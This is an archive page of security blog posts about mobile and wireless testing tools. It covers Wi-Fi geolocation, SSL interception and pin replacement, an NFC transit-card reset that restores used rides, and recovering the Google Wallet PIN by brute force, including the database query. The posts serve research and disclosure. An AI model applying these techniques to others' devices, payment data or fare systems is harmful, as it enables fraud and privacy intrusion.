Intrepidus Group

Category Archives: Tools

iSniff your Wi-Fi and GPS your House

Posted: May 10, 2013 – 9:52 am | Author: | Filed under: Geolocation, iOS, Privacy, Risk Analysis, Tools, Wireless

It’s been a while since I thought much about location-based services on iOS systems, in particular their privacy implications. Of course “Locationgate” happened back in March 2011, when researches called public attention to a database of location points saved on iPhones. A year later, Mark Wuergler reported on a possible information leak where iOS devices disclosed the MAC addresses (more properly, BSSIDs) of the last few access points they’d linked to.

These two issues were brought together last summer, at the Black Hat Arsenal, when Hubert Seiwert (@hubert3) presented a tool called iSniff GPS. The tool was described in more detail at Syscan in Singapore just a couple of weeks ago, but finally came to my attention in a tweet Wednesday night pointing me to SC Magazine (Australia).

Intrigued, I spent some time yesterday installing the iSniff tool and putting it through its paces, and have a few thoughts I’d like to share.

You can easily map access points by name using queries to the WiGLE database.

You can easily map access points by name using queries to the WiGLE database.

The iSniff GPS tool contains two main components: A sniffer, and a GUI. The sniffer watches for leaked ARP packets, identifies the BSSIDs they’re probing for, and fetches information about them from Apple. The web-based GUI (built on Django) shows you the devices that have been “noticed” on the local network, and lists networks those devices have visited. When a probed network was matched in Apple’s database, a link will also take you to a visualization of all the data Apple has on file regarding that access point’s location.

After installing the tool, I took an old access point, connected my laptop directly to it, and joined a few iOS devices to see what happened. The tool was definitely working as designed — devices immediately appeared in the list, along with a list of BSSIDs each client probed for. Clicking on each client in the list displays a detail screen with latitude and longitude for each network BSSID found in the Apple DB, and a link to display the information on a map. Another tab pivots the data, listing it by network (with the relevant clients next to each), while other tabs offer direct mapping of selected BSSIDs and even searching and mapping of the SSID database.

Clients detected, and the APs they queried for (anonymized, obviously).

Clients detected, and the APs they queried for (anonymized, obviously).

Interestingly enough, none of the access points the devices queried were in Apple’s database. The access point at work was found in the WiGLE DB (listed both by name and BSSID), but not in the Apple DB. My home access point didn’t show up in either database, despite having several iOS devices connecting on a daily basis, not to mention multiple visiting family members most of whom have iOS devices as well. [Note: Not entirely correct, see update below.]

However, another network in the building did show up in Apple’s DB, and I was also able to accurately geolocate several access points near our sister company (iSEC Partners) in Manhattan. Perhaps there hasn’t been enough traffic by our building in the year since we moved in? We just haven’t been reported frequently enough to be included in the database?

The red dot is where Apple thinks the AP is (it's actually inside the left edge of the nearby building)

The red dot is where Apple thinks the AP is (it’s actually just inside the adjacent building)

That’d be a great theory, except that the BSSID for the access point I was testing with also appeared in the Apple DB. That seemed really odd, since this AP is almost never on, and when it is, it’s rarely for more than a few days at a stretch, and almost never accessed by anything other than my own devices. Occasionally it’ll be set up as “attwifi” for testing, and I’ll get a few people in doctors’ offices connecting (and enjoying free internet access), but that’s probably no more than a dozen devices, all told, ever. Finally, the AP gets brought to the beach every year (and lots of people use it there) but that’s obviously a totally different location, and even then, not more than a couple dozen additional devices. And again, only for a week.

So why is an access point, active 24×7 for over a year, not in the database, and another one, in use for maybe 3 or 4 weeks total time over the same year (and one of those weeks in a different state), not in the database? There’s definitely some odd criteria in play here that I haven’t yet been able to guess at.

What does all this mean? It’s clear that the Apple BSSID database has real utility: It helps devices quickly, and more accurately, determine exactly where they are. There might be a way that Apple could restrict how queries are performed on the database, but it’s possible that would be difficult to do effectively. And of course, Apple isn’t the only entity maintaining such a database. Trying to keep your AP information out of a publicly-accessible database just isn’t going to happen.

On the other hand, the leakage of the BSSID data when a device joins another network is a little harder to justify. What exactly is the utility the user gets from this? A faster recognition by the device that it’s on a network it knows? What services benefit from this, and to what degree? It may well be acting in accordance with RFC 4436, but that doesn’t necessarily make it right (and very few, if any, Android devices exhibit the same behavior).

Ultimately, the real question is whether the daily benefit to the end user outweighs the risk that the location of their home, or school, or workplace, might be disclosed to an eavesdropper at a coffee shop. Which, in a strict risk analysis, probably falls far short of requiring elimination of the leakage. Perhaps it could be mitigated with a user preference setting, but this problem is pretty esoteric even for information security researchers, and I suspect clearly describing the problem (and its implications) to the average user in the space of a few lines on a preference pane would be flat-out impossible.

At any rate, this is a very interesting demonstration of fusing publicly-accessible data from multiple sources to gain information not otherwise explicitly revealed. And that in itself definitely makes the iSniff GPS tool worth checking out.

Quick Update, 5/13/2013: I was out of town over the weekend, but now have done a little more checking, based on Hubert’s comments below and on Twitter.

Turns out, of the two networks at work (open/guest and closed/employees), one of the guest BSSIDs is in Apple’s DB, but none of the closed BSSIDs are, which still seems odd to me. Of four neighboring business’ BSSIDs checked, all four are in Apple’s DB. And I looked again for my home AP, and it was in there — I’d been querying the wrong MAC address. :(

So the AppleDB is a little more complete than I’d thought, though there’s still something keeping our main work net from showing up.

And I also verified that the ARP queries being sent out by iOS devices upon joining the network are not for our local APs, but for the router / DNS server (which are both the same here). So for places where the router / DNS is also the Wi-Fi access point (many, many places), the ARP disclosure can lead to geolocation via Apple’s DB. But where the Wi-Fi and router / DNS are split to multiple devices, it’s a bit harder to find.


APKTool, make me a logcat sandwich

Posted: March 8, 2013 – 2:57 pm | Author: | Filed under: android, Mobile Device Management, Mobile Security, Reverse Engineering, Tools

I recently turned a few friends on to Zed Shaw’s “learn python the hard way” course and it reminded me how bad of a programmer I can be. In fact, I’m that guy how litters his code with print statements. So it’s probably no shock then that a lot of times when I’m trying to figure out what’s going on in an Android app we’re reversing, that I’ll want to drop in some print statements. I use to do this by adding a few lines of smali directly into a class file, but there were a few things I needed to deal with for that to work how I wanted it. For example, here is what the default “debug” log call looks like in smali.
invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
If you were going to drop this line into the code somewhere, you would need to make sure both v0 and v1 are Strings. I would typically want “v1″ to be the string I wanted logged out, and “v0″ (in this example) to be the log “Tag” value so I knew where I was in the code when it was dumped to the log (I may have a dozen or so values getting logged out, so this helps to keep things straight when you see them in the logs). Setting up this Tag string and not stomping on things sometimes meant I needed to increase the local variable count and add some more lines for setting the string and then making sure I got the register/variables correct in that previous logging line. This worked alright if it wasn’t too late in the night or I had enough caffeine in me, but I typically would screw something up and would end up recompiling a bunch of times. I wanted an easier way and something that could deal with logging out things that weren’t already strings.

Thus I created this simple class file I can drop into the root of any application (yes, this is not as good as a real debugger using JDWP, but sometimes doing things quick and dirty gets the job done quicker for me). I wanted to stay with Android log utility syntax, but simplified a few things. I overloaded the logging object’s “d” method so that it could take just about any variable type I was dealing with. One handy example of this is a byte arrays (which is often what we find decryption keys stored in). The wrapper in IGLogger will convert the byte array into a hex string and dump that to the logs. All you need to add is one statement to the code. If “v0″ contained a byte array we wanted printed out, just drop this line of code.
invoke-static {v0}, Liglogger;->d([B)I
Since “iglogger.smali” is in the root of the recompiled APK, we can statically invoke it from any other class in the project. In this case, we need to tell the “d” method v0 is a byte array “[B” and sticking with the standard Android logging utility class, we’re returning an Integer (although I’ve thought about just making that a Void… I never check it). You may notice we’re not passing a log Tag variable with this statement. IGLogger supports that if you want, but we’ve added a trick to IGLogger that I find works pretty well. In IGLogger, we’ll create a new Throwable object, get the getStackTrace method to find out the last class and method we were in, and put that in our log Tag. If the APK is not obfuscated, this will even include a line number. This same trick allows for a very simple “hey, I got here and this is how” stack trace method to be dumped by placing this one line of code anywhere.
invoke-static {}, Liglogger;->d()I
You might have heard a lot of us here are fans of Virtuous Ten Studio for working with smali. I have a bunch of these IGLogger print statements in  Extras->Smali->CodeSnippets. Makes it really simple to just click and drop in a log statement.

But that wasn’t good enough for Niko here when we had a massively huge app that was obfuscated. He talked me into automating the process of logging out each class and method that was entered so we could watch the logs and know what code paths were being taken. I ended up rolling this into a Python script I had written to “fix strings” in decompiled Android apps. You are probably aware that proper Android apps will have their strings placed into XML files so that it’s easier to internationalize the application. While this might be nice for developers, it means when we’re reversing an application, we may end up with some strange hex value instead of a readable string. “” would loop through the decompiled code and add these strings back in as a comment tag when ever they showed up in the smali code. Your mileage may vary with how well this works, but in some apps, it helped us find things easier.

Adding on to that code base, I started to include some code to automatically add IGLogger statements around things I thought could be interesting. This includes a log statement after the “prologue” of any method. Also, any time we see two strings being compared, we’ll log both strings (this is always fun for watching a password being checked or when the app pulls up device info to see if it’s running on the right hardware). We plan to add a few more things for dumping Intent messages and URLs, but this is a start for now.

This of course will make the app run hella slow, fill up logcat, and in some cases break the application. I’ve tried to avoid that last one as best I can for now, but it is possible this script will massacre an APK so badly it will be unrunnable. If you run into that issue, you can turn off the lines that will add these automatic logging statements to the code (ie, JonestownThisAPK = False).

The last thing we added to the Python script was some searches to pull out info we may find interesting when assessing an APK file. We dump this into a file called “apk-ig-info.txt” and review it after decompiling the APK. Again, this is something we’re continuing to refine. You can find the code on the Intrepidus Group github repo:


Comments disabled

Armor for Your Android Apps – ShmooCon follow-up

Posted: February 27, 2013 – 1:26 pm | Author: | Filed under: android, Conferences, Fun and Games, Mobile Security, Tools

Hopefully, everyone’s already decompressed from all the Shmoocon partying by now. I wanted to follow up on the IG Learner app that I presented during my “Armor for your Android Apps” talk and give out a couple of tips on how to approach cracking the challenges (which aren’t all that hard, really).
Before I dive into the meat of the lessons, I just wanted to point out that if you didn’t attend the conference but still want the app, you can get it from the Play Store:


So, you’ve got everything installed and running. At this point you have two options – take the easiest way and hit the walkthrough or try to dig through the lessons yourself. I intended for the walkthrough to serve as a helper thing, but if you’d like to just use it to run through the whole thing, sure, that’s an option, too. The link to the walkthrough is provided at the end of this post.

In if you want to do it yourself but are not sure where to start, here’s a few general tips:

1. You will end up using Android SDK / Android monitor (monitor.bat) very heavily. I am guessing that by now you have that installed on your system anyway.

2. Use dex2jar ( to convert APK’s Dalvik executables (*.dex) into their Java representation – since the code is not obfuscated, this will really help you understand the logic of the lessons.

3. Apktool ( – this command-line utility lets you decompile APKs and recompile them back. You’ll definitely need this on a few occasions.

4. Jarsigner – comes with Java SDK, is necessary to install an app on an Android device. Read here about signing of APKs:

5. Virtuous Ten Studio ( – Smali IDE, complete with syntax highlighting / automatic signing / APK upload. Awesomeness redefined. If you want to bypass 3) and 4) and not have to deal with it, go the VTS way. That said, I’d still recommend familiarizing yourself with the command line versions of the tools – just so that you understand better what’s happening behing the scenes.

6. Some knowledge of Java is definitely helpful for quick completion of challenges.

7. “adb shell pm list packages” gets you the list of packages installed on the phone. IG Learner is one of them.

Now, let’s go to some specific tips per lesson:

1. Lesson 1. This one is pretty self-explanatory. If you start the Android monitor and look at the log output,  you’ll see the answer to the challenge. Easy as that.

2. Lesson 2. Convert the APK into Java and try to figure out the filename that’s being created. Another hint: default directory for Android app file storage is /data/data/<packagename>/files.

3. You can figure out what the URI scheme is just by looking at the lesson screen and requesting a URI. Now try to look through decompiled code (Either Smali or the Java representation) to figure out what the lesson is expecting. Also, pay attention to extra activities in the app.

4. You should use a local proxy to intercept application traffic (Burp Suite maybe?) Keep in mind that you can’t man in the middle SSL traffic unless the SSL certificate presented by the remote server is verified. And for that (at least, for Lesson 4) you need to update your trusted CA store with the signing certificate of your local proxy. Once you export that certificate (there are multiple ways to do it, using Internet Exporer’s certificate export wizard is one of them), you should be able to import into into the trusted CA store by placing it in the root of /sdcard and importing it through the Android’s Trusted Credentials menu.

5. This lesson is a bit trickier. For one of the ways to solve this, I suggest looking through the Smali code and finding the pin for SSL certificate that you can get by running Moxie Marlinspike’s script on our certificate. Then you can replace this with your own intercepting proxy certificate’s pin, recompile the app, and push it back to the phone. You’re good to go.

6. Hard-coded keys are awful. Seriously. When you’re playing around with symmetric encryption as you’re trying to find the correct value of the encrypted string, make sure that you convert that to Base64 for readable output. The logging facilities are there to help you.
The encryption can be done in less than 10 lines of Java code. If you’re struggling with that, check out our GitHub repository for a helper Java class.

7. Content providers are advertised in the Manifest. Mercury ( is a great framework that lets you easily query those providers. This should be enough to successfully complete the challenge.

8. I’d recommend starting with decompilation of the app and looking at the Lesson8Activity. This may give you an idea of what the Intent handler is expecting. From there you can either download the Lesson8Aux app from the Play Store (, decompile it, modify it to throw the correct Intent to the application, or just use the “am” command to do just the same. Whichever is easier for you is fine, but I recommend going the auxiliary app way just to gain some more practice exercises decompiling and recompiling Smali code.

Oh, and yeah, the walkthrough (Huge thanks to our intern Nitin for putting it together!). Here it is:



Comments disabled

Getting ready for ShmooCon

Posted: February 12, 2013 – 1:20 pm | Author: | Filed under: Conferences, Cryptography, Fun and Games, Tools

It’s almost time for another ShmooCon, and as usual, we’ll be out in force for the conference. We won’t have a booth this year, but we will be milling about, attending talks, and even giving a couple presentations of our own. We might even have a little puzzle to share…just ask any one of us for details. (David might have a slightly more visible puzzle contest as well, but, well, there were secrecy oaths, threats of retribution, etc., so the less said about that, the better).

Be sure to check out our talks, too. Roman Faynberg will be presenting Armor For Your Android Apps, Saturday at 3:00, a discussion of Android vulnerabilities, with plenty of real-life examples and hair-raising war stories, as well as tips and best practices to avoid such problems in development. There’s even a HackMe-type app to help demonstrate some of the problems.

At exactly the same time (sorry, we couldn’t control it!), David Schuetz will be presenting on Protecting Sensitive Data on iOS Devices. His talk will try to cut through some of the technical mumbo-jumbo and present best practices for configuration, management, and application develoment on iPads and iPhones, with a goal to making it easy to explain to management-types.

We’re also hiring! Current openings for [testers | consultants | ninjas | pirates] (sorry, no open positions for samurai or lumberjacks). If you’re interested, chat with one of us at the con, or send us an email at

So if you’re going to be at ShmooCon, stop us in the halls and have a chat. We can’t wait to see you!

Comments disabled

UltraReset – Bypassing NFC access control with your smartphone

Posted: September 21, 2012 – 8:24 pm | Author: and | Filed under: android, bugs, Conferences, Mobile Security, NFC, RFID, Tools

We were just in Amsterdam to present our research on uses of NFC for physical access control. The two main industries we focused on were transit and hotel systems. Ever since Intrepidus got us Nexus S phones with NFC early last year, we’ve been looking for real world uses of NFC on our trips. We discovered the flaw with the SF Muni Ultralight cards last year on a trip there and followed up with informing them of the issue in December. At the time, we had to take the cards home and use an NFC reader connected to a laptop to do testing. Since then, things have changed; the Android API supports reading from and writing to most Mifare NFC cards, Ultralights included.

Some of the coverage of this has confused all NFC transit systems with those using the Mifare Ultralight cards incorrectly. In our presentation, we listed several cities that we know have NFC transit systems as an example of how widespread the technology is becoming. We listed two cities using Mifare Ultralight cards incorrectly that we have 1) tested and 2) contacted with remediation details.

For those of you that missed the video, we have it posted here:

UltraReset Screenshot

UltraReset resetting an Ultralight transit card

This was a NJ Path 10 trip Ultralight card in the video. When we tap the card to the phone, our application reads all the data in pages 4 to 15 from the card and stores the data to the phone (we also store the card’s UID which we’ll write about more next week on hotel card issues). We then tap the card between two turn styles (which is why the count jumps by two). Once the 10 trips on card have been used up, touching it back to the phone causes the application to write the data back to the card. And with that, the card looks to be back in its original state when it was purchased with 10 rides remaining.

While these Ultralight cards don’t have access control features which are found in more expensive NFC cards, they do support a feature called a “One Way Counter” (which was named One Time Programmable or “OTP” in previous documents). These bits are in page 3 of the card’s data and once a bit is turned on, it can never be turned back off. This way, a card could be limited to being used only a limited number of times. These bits are left unchanged by the two transit systems we looked at which used Ultralight cards.

Ultralight Card OTP values

The one way counter (OTP) values of of the NJ Path card (top) and SF Muni (bottom). Neither system changes these bits when the card is used.

We know a number of cities are looking to roll out contactless technology and hope we can bring light to this issue so that it is implemented correctly in the future. One of the items we also raised in our talk is that full card emulation on smartphones is likely to happen soon. When this does, it could cause a number of NFC based access control  systems to be re-evaluated.

If you think your system might be vulnerable to this issue, we have put an Android application in the Play store which will read and compare the one way counter (“OTP”) on Ultralight cards. Note, the standard cards that you might get from transit systems typically are not Ultralights. Ultralights are typically only used for  “disposable” or “limited use” type tickets.

We have been reading lots of insightful comments on the articles we’ve seen. Please feel free to post questions or comments here and we will do our best to answer them (and no, we’re not planning to release the full UltraReset application). Last but not least, we would like to thank dragos and crew for having us at another one of the SecWest events — it’s always a great to catch up with folks in the industry and hear talks in the single track format. Thanks!

~Corey and Max

Comments disabled

Android Network Analysis Redux

Posted: June 27, 2012 – 2:17 pm | Author: | Filed under: android, Tools

There are a lot of ways to do network analysis of mobile apps. Probably too many. There is no right answer, but there are some solutions that will be better than others depending on how the app is developed and what type of traffic you want to analyze. This post is a summary of some ways you can setup your environment so that you can perform network analysis on a mobile app.

The options (that I can think of):

  1. PPTP server – redirects traffic through the PPTP server and the PPTP server attacks the traffic accordingly.
  2. Wireless AP – you setup a wireless AP on your laptop and bridge the traffic between it and a wired connection.
  3. ICS Wifi Proxy – Android 4.+ supports HTTP proxies over wifi but it only tunnels traffic from the built in browser.
  4. ProxyDroid – on rooted devices, the app will use iptables to forward traffic to a proxy (HTTP,SOCKS, etc) of your choice.
  5. Manual IPtables – again for rooted devices only, make iptables rules on the device to forward traffic where you want it. It’ll takes a long time to setup but works OK.
  6. Poisoning – arp poisoning, dns poisoning, DHCP exhaustion, whatever. Redirect outbound traffic to a host of your choosing using network attacks. Not really feasible but I’ve seen people try.
  7. APK hacking – recompile an APK to force requests to go to a different host. Works great when you need it to but it can be unstable and time consuming to get working correctly.
  8. Emulator HTTP proxy – load the app into an emulator and redirect traffic to an HTTP proxy. Works well but sometimes app’s don’t allow themselves to be run on an emulator.

There are a lot of factors in deciding which hack is right: Is the mobile app doing SSL? Can I run it in a proxy? Do I have root on my device? Am I onsite with the client? Am I in the office? Do I have nothing better to do than spend the next 10 hours getting my environment setup?

This is a table that covers different ways you can set yourself up to analyze network traffic. Some of these are horrible ideas and are put down just to add to the list.

This is by no means scientific and my opinions alone so there may be more questions raised by this thing than answers. But for the purporses of this blog post, this is accurate…enough..ish.


ProxyDroid: This is in my opinion the best bang for the buck because I really like how easy it is to setup in minutes, forward it to BurpSuite, which for me is most likely already running, and you can start analyzing HTTP/S traffic. I will admit that the fact that it sets up in minutes and works with existing web hacking tools is 90% of the reason why I like it. The other thing that works well is that because of Android’s security model, which gives every app a unique UID, ProxyDroid will make iptables rules for specific UIDs. This means you can proxy just the traffic from a single app instead of the entire device.

Wireless AP: This setup works well and it’s what I used for a long time. A common setup is where you use your laptop as a wireless access point, connect the Android device, and bridge the connection to a wired network. In the middle you can use Mallory or BurpSuite to analyze the traffic. This is similar to the PPTP server setup discussed below in that you’re making iptables rules to handle the traffic, and forwarding it to your analysis tool of choice.

PPTP Server: Setting up a PPTP server and forcing an Android device to connect to it works great for just about any type of mobile test. All of the network traffic, no matter if it’s HTTP or some weird non-standard protocol, will pass over the connection making it great for non-HTTP apps. Once it’s setup, you can turn it into a pretty stable solution. The long time it takes to setup can be improved with scripts and it can be buggy if you aren’t comfortable with network configurations. But in general, a good option. This is the recommended setup for Mallory FYI.

I’ll be going a little more indepth about using BurpSuite with ProxyDroid in the next post because there are some small configuration issues to take into account. If you use something that I’ve missed or something that works better for you, let me know in the comments or send me an email.mark.manning@… you know.

Comments disabled

Java Reflection in Android…FTW

Posted: April 13, 2012 – 11:57 am | Author: and | Filed under: android, Conferences, Mobile Security, NFC, Reverse Engineering, RFID, Tools

I’ll be hitting a few smaller security conferences this spring (whatup BeaCon and BSidesROC) with a turbo talk on how Java reflection can be useful for accessing hidden APIs in Android. The team at Gibraltar had some great posts on this last year, but getting reflection to work for accessing the NfcAdapterExtras and NfcExecutionEnvironment classes was not as straight forward as things seemed. Here’s some tips on how to get it working (at least on an Gingerbread Nexus S).

First, you want to get familiar with the nfc_extras framework. This is not included in the standard Android SDK, but you can either pull the /system/framework/ file from a device or look at the Android source. You’ll see there are two classes: NfcAdapterExtras and NfcExecutionEnvironment. What I really wanted was in the embedded NfcExecutionEnvironment, but the proper way to get that object is from NfcAdapterExtras.getEmbeddedExecutionEnvironment(). So we’ll need to create that object and method first.

I decided to use reflection to access these classes in my own Android application. Since they’re not in the SDK, I couldn’t just “include android.nfc_extras.NFCAdapterExtras” in my code. Instead, we’ll just ask for that class by name at runtime.

String sReflectedClassName = "";
Class cReflectedNFCExtras = Class.forName(sReflectedClassName);

Wow, that’s pretty easy. Except that we’re going to need to tell the Dalvik VM to load that additional nfc_extras framework so that it knows about that class. To do that, add the following after your application tag in the AndroidManifest.XML file of your application.

<uses-library android:name=”” android:required=”true” />

Now back to our “cReflectedNFCExtras” class. The first thing we’ll need to do is get the singleton NfcAdapterExtras. This is returned by the get(NfcAdapter paramNfcAdapter) method. Note that it takes an NfcAdpater as a parameter, so we have to specify the class for that when looking for this method. The following line should work for that.

Method mReflectedGet = cReflectedNFCExtras.getMethod("get", Class.forName("android.nfc.NfcAdapter"));

However, at first I had mistake in my code that cause this method not to be found (thank Jeremy for fixing this). So instead, I had looped through all the methods using getDeclaredMethods() and stopped when the “get” method we want was found. Here’s the code for doing that followed by invoking the method and passing it the default NFCAdapter which would be the next thing we’d want to do.

Object oReturnedNFCExtras = null;
Method mReflectedMethods[] = cReflectedNFCExtras.getDeclaredMethods();
for (int i = 0; i < mReflectedMethods.length; i++){
   Log.d("NfcAdapterExtras METHOD:", mReflectedMethods[i].getName());
      //Standard default NFCAdapter... need to pass this in to get back the singleton
      NfcAdapter defaultAdapter = NfcAdapter.getDefaultAdapter(this);
      oReturnedNFCExtras = mReflectedMethods[i].invoke(cReflectedNFCExtras, defaultAdapter);

From here out, it’s smooth sailing as long as you take care of one more thing. Your application needs a special premission in order to use this framework, the one for “NFCEE_ADMIN“. The problem is this premission is declared with the protectionLevel of “signature” in the package. There’s a few ways to get around this, but as far as I know, they’ll all require that you have root on the device. Thus, even though we’re using reflection to access these classes, Android’s permissions are still enforced. My way of dealing with this was to resign the package with the same certificate I used to sign my newly created Android application, then adding the following line to my application’s AndroidManifest.xml

<uses-permission android:name=”” />

So there you go. We can now be NFCEE_ADMIN’s as well (on our own rooted devices) using reflection. I’m curious to try this out with other /system/framework packages as well. In most cases, the process should be more straight forward:

  1. Create a class using Class.forName(“package.class”)
  2. Find the method using  getClass().getMethod(“method”, paramTypes)
  3. Then invoke the method with the proper parameters


1 comment

Google Wallet PIN Brute Forcing

Posted: February 9, 2012 – 10:46 am | Author: , and | Filed under: android, Mobile Security, NFC, Tools

Google Wallet is a project of great interest right now as it is a big shift in how we pay for goods and services in the US (Japan is quite far ahead of everyone on mobile payments). Some researchers have discovered that Google Wallet is storing the PIN for your wallet on the device in a relatively insecure format. Since this information was already released into the wild, we felt we should share our perspective and how we would approach this problem. The PIN data is stored in the application’s SQLite database.

The SQLite database is stored in the Google Wallet data directory. Google wallet stores the pin in the proto column of the metadata table. The data is encoded using the protobuf format (also by Google). The following SQL query retrieves the data:

select hex(proto) from metadata where id = "deviceInfo";

This query retrieves the protobuf data encoding a number of device and user specific information. Protobuf is a data serialization format, similar to JSON in concept. Next the data must be deserialized. The standard way to work with protobuf data is to define a .proto file, which acts as a key for deserialization. These .proto files get compiled down to application specific code and are not in their native human readable format. Raj decided to start to write a generic protobuf decoder (Protobuf Easy Decode) . This Python module can decode protobuf data without a .proto file. Some data is inevitably lost when reading raw protobuf data without a .proto file.

Recovering the PIN with the decoded data required some understanding of the specific .proto structure. Once the salt and the hash of the salted pin retrieved, brute forcing the PIN is a trivial matter: illustrates how to brute force the PIN.


@0xd1ab10 and @0xb3nn

1 comment

Ubertooth: Bluetooth Address Breakdown

Posted: January 29, 2012 – 2:03 pm | Author: | Filed under: Tools, Wireless

The IG crew is just heading back from ShmooCon, which reminds me of last year’s awesome talk on the Ubertooth One. Intrepidus backed the kickstarter project and, as promised, got 2 Ubertooths. We recently started playing with it, and have a couple of tips and a supplementary script.

We originally followed the post here to get the Ubertooth set up on BackTrack 5, but then had some trouble keeping the device connected and sniffing reliably (similar to our experience with the Proxmark III — sensing a trend here ;) ) After updating the firmware and setting this up on an Ubuntu host, the device works flawlessly. I honestly don’t remember if these are my comments in the commands below or if I found it somewhere on the internetz. I apologize if I stole your commands:

cd ubertooth/trunk/host/bluetooth_rxtx/
./ubertooth-util -f #puts the device in flash mode. lights should blink prettily.
cd ../usb_dfu/
./ubertooth-dfu write /path/to/firmware/bluetooth_rxtx.bin #this is the standard firmware. there are other special ones. suit yourself.
../bluetooth_rxtx/ubertooth-util detach

The “Getting Started” section of the Ubertooth site gives a pretty good idea of what the device can do. We found that the Ubertooth sits on one Bluetooth channel (out of the 79) and sniffs the LAP out of the Bluetooth packets. A little bit on Bluetooth address breakdown (This image is from section 3.2 of this paper):

Bluetooth address breakdown

Bluetooth MAC addresses are comprised of 3 pieces: the Lower Address Part (LAP), Upper Address Part (UAP), and the Non-significant Address Part (NAP). The picture above illustrates this nicely. The Ubertooth can sniff the LAP out of the air, and use the error checking field in the Bluetooth packets to figure out the UAP (ubertooth-lap and ubertooth-nap, respectively).

The NAP (and UAP) are assigned on a per-vendor bases by the IEEE. That means the UAP is available through both the Ubertooth and the IEEE database of NAP+UAP addresses. Using both these resources (and matching up the UAP from both), we can figure out the first 2 NAP bytes pretty quickly! Of course it’s also possible to figure it out if we haven’t calculated the NAP (by appending the LAP to everything we can pull from the IEEE database and ping each one sequentially).

Automating stuff is fun. Here’s my (sloppy) script to figure out the NAP using first the short method, then the long if that one fails:

– Max

Comments disabled

Man-in-the-Middle (MiTM) and certificate setup on Android 4.0

Posted: December 15, 2011 – 11:50 am | Author: | Filed under: android, Cryptography, Mallory, Mobile Security, OWASP, PKI, ssl, Tools

The Nexus Galaxy and Android’s Ice Cream Sandwich (ICS) are finally here. If you’ve done Android application testing in the past, you’ve probably have tried to install your own Certificate Authority (CA) cert on to an Android device or emulator. This process was somewhat painful and required root level access on physical devices. We have an old blog post here on that process, but that all changes now with ICS.

Installing a certificate can now be done in the Settings->Security menu of an Android 4.0 device and handled in the “Credential Storage” section. This does not require the device to be rooted (at least on the builds we’ve seen so far). The “Trusted Credentials” setting will list both the system wide installed certificates as well as any user added ones. An additional feature is now with a few simple clicks, the end user can disable any CA certificate on their device. Is your vendor still hanging with DigiNotar? Now you can disable that yourself without having to pull files from the device. Just click on the certificate, scroll down to the bottom of the pop-up message, then click the “Disable” button on the right.

Android 4.0 Credential Storage menu

Installing your own certificate is almost as easy. Here was my process. I needed the CA cert I generated in Mallory loaded onto to my Nexus. Mallory creates a unique CA certificate per-installation and stores it in Mallory’s “ca” directory.  To move this onto the phone, I started up Python’s SimpleHTTPServer in that directory.

~/mallory/current/src/ca$ python -m SimpleHTTPServer

Now on the phone, I pointed the browser to that server on port 8000 in order to download the “ca.cer” file (adjust your IP address/port/filename as necessary).

On my device, this dropped the CA certificate to the SD card. Back in Settings->Security screen, find the “Install from storage” option. Click that and your “ca.cer” file gets loaded into the “Trusted Credentials” store under the “User” tab.  No bouncing castles or root needed. This will require you to set a passcode on your device (if there is not one already). Face unlock doesn’t appear to cut it just yet.

Oh Mallory, you look so fine.

Mallory's CA Cert loaded on the device



1 comment


This site is protected with Urban Giraffe's plugin 'HTML Purified' and Edward Z. Yang's Powered by HTML Purifier. 24799 items have been purified.